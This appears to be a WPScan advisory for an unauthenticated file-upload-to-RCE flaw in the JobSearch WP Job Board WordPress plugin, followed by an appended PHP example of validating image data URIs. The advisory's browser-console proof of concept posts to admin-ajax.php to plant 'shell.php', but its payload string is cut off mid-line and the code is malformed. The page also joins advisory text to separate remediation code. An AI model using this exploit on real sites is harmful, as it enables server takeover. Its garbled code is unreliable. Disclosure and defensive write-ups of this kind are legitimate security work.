wpvulndb | Furkan Gedik | WPVDB-ID: 757412F4-E4F8-4007-8E3B-639A72B33180
History: Feb 02, 2024 - 12:00 a.m.

JobSearch WP Job Board < 2.3.4 - Arbitrary File Upload to RCE

Published: 2024-02-02 00:00:00
Author: Furkan Gedik
Source: wpscan.com
Tags: arbitrary file upload, remote code execution, unauthenticated attackers, php, security plugin

AI Score: 6.8 Medium (Confidence: High)
EPSS: 0.0004 Low (Percentile: 9.1%)

Description: The plugin does not validate the files it accepts for upload, which could allow unauthenticated attackers to upload arbitrary files, such as PHP scripts, to the server.

PoC

Navigate to the site, and paste the following in your browser's console:

fetch('/wp-admin/admin-ajax.php', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: new URLSearchParams({ 'action': 'jobsearch_facebook_get_soc_login_url', 'user_data': JSON.stringify({ "given_name": (Math.random()*0x1000).toFixed(), "family_name": (Math.random()*0x1000).toFixed(), "picture": "data:, response.text()) .then(data => console.log(data)) .catch(error => console.error('Error:', error));

Notice a new file named "shell.php" was uploaded to the site.
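The missing validation the description refers to, as an added example that is not the plugin's own code: the `picture` field arrives as a `data:` URI, so a safe handler has to decode it and accept only content that really is an image, under a server-chosen name. The helper names, the size limit and the `$uploadDir` destination are assumptions for this example.

```php
<?php
// Added example, not the plugin's code: validate a base64 data: URI before
// writing it to disk. Helper names and the upload directory are assumptions.

const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

const MAX_PICTURE_BYTES = 2 * 1024 * 1024; // assumed limit for a profile picture

/**
 * Decode a data: URI carrying a profile picture and return its bytes and a
 * safe extension, or null if anything about it is not an allowed image.
 */
function decode_picture_data_uri(string $dataUri): ?array
{
    // Accept only the exact shape data:<mime>;base64,<payload>
    if (!preg_match('#^data:([a-z]+/[a-z0-9.+-]+);base64,([A-Za-z0-9+/=]+)$#i', $dataUri, $m)) {
        return null;
    }
    $declared = strtolower($m[1]);
    if (!isset(ALLOWED_IMAGE_TYPES[$declared])) {
        return null; // declared type is not on the allowlist
    }
    $bytes = base64_decode($m[2], true); // strict mode rejects malformed base64
    if ($bytes === false || $bytes === '' || strlen($bytes) > MAX_PICTURE_BYTES) {
        return null;
    }
    // Never trust the declared type: sniff the decoded content.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->buffer($bytes) !== $declared) {
        return null;
    }
    // Require a parsable image; a script wrapped in an image MIME label fails here.
    if (@getimagesizefromstring($bytes) === false) {
        return null;
    }
    // The extension comes from the allowlist, never from client-supplied data.
    return ['bytes' => $bytes, 'ext' => ALLOWED_IMAGE_TYPES[$declared]];
}

/**
 * Store a validated picture under a random server-generated name and return
 * the path, or null if the input was rejected or the write failed.
 */
function store_picture(string $dataUri, string $uploadDir): ?string
{
    $img = decode_picture_data_uri($dataUri);
    if ($img === null) {
        return null;
    }
    $name = bin2hex(random_bytes(16)) . '.' . $img['ext'];
    $path = rtrim($uploadDir, '/') . '/' . $name;
    if (file_put_contents($path, $img['bytes'], LOCK_EX) === false) {
        return null;
    }
    return $path;
}

// Constructed inputs: a 1x1 PNG, and text content mislabelled as image/png.
$png  = 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==';
$fake = 'data:image/png;base64,' . base64_encode('<?php echo 1; ?>');

var_dump(decode_picture_data_uri($png) !== null);
var_dump(decode_picture_data_uri($fake));
```

The two checks that matter most are the content sniff against the declared MIME type and the server-generated filename: together they stop both a mislabelled script body and a client-chosen `.php` extension from reaching the web root, which is the combination the PoC above relies on.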

CPE: Name (empty), Operator eq, Version 2.3.4
